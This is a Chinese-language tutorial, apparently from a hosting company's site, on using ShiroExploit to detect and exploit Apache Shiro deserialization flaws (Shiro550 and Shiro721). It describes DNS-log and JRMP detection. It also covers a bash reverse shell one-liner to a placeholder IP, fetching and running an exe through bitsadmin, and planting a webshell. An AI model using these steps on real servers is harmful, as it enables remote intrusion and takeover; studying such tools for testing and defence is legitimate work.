本篇内容主要讲解“Shiro漏洞检测工具ShiroExploit怎么使用”,感兴趣的朋友不妨来看看。本文介绍的方法操作简单快捷,实用性强。下面就让小编来带大家学习“Shiro漏洞检测工具ShiroExploit怎么使用”吧!
支持对Shiro550(硬编码秘钥)和Shiro721(Padding Oracle)的一键化检测,支持简单回显。
Shiro550
无需提供rememberMe Cookie, Shiro721
需要提供一个有效的rememberMe CookieShiro550
无需选择操作系统类型, Shiro721
需要选择操作系统类型使用 ceye.io 进行漏洞检测
URLDNS
筛选出唯一 Key,然后依次调用各个 Gadget 生成 Payload使用 dnslog.cn 进行漏洞检测
dnslog.cn
申请一个 DNS Record。URLDNS
筛选出唯一 Key,然后依次调用各个 Gadget 生成 Payload使用 JRMP + dnslog 进行漏洞检测
java -cp ShiroExploit.jar com.shiroexploit.server.BasicHTTPServer [HttpSerivce Port] [JRMPListener Port]
开启HttpService/JRMPListener,并按照要求填入相应 IP 和端口HTTPService
默认监听 8080
端口, JRMPListener
默认监听 8088
端口JRMP
的方式进行漏洞检测,可以显著减小 cookie 大小URLDNS
筛选出唯一 Key,然后使用 JRMP
依次为各个 Gadget 生成对应的 JRMPListener使用回显进行漏洞检测
https://blog.csdn.net/fnmsd/article/details/106709736
介绍的方式实现回显,在本地可以测试成功,但是在实际环境中基本不成功(可能是我的姿势有问题,欢迎探讨),所以目前是通过读写文件的方式实现回显,后期可能会加入其它方式反弹shell(linux)
采用 bash -i >& /dev/tcp/1.2.3.4/443 0>&1
的方式反弹 shell反弹shell(Windows)
采用 bitsadmin
下载指定 URL 的 exe 文件并执行的方式获取 shell获取Webshell
可以在能够回显的情况下直接在使用者给出的路径(目录需要真实存在)下写入 webshell, webshell 名称和后缀名由使用者自行指定,webshell 的内容从 config 目录下的 shell.jsp 中读取到此,相信大家对“Shiro漏洞检测工具ShiroExploit怎么使用”有了更深的了解,不妨来实际操作一番吧!这里是亿速云网站,更多相关内容可以进入相关频道进行查询,关注我们,继续学习!
免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。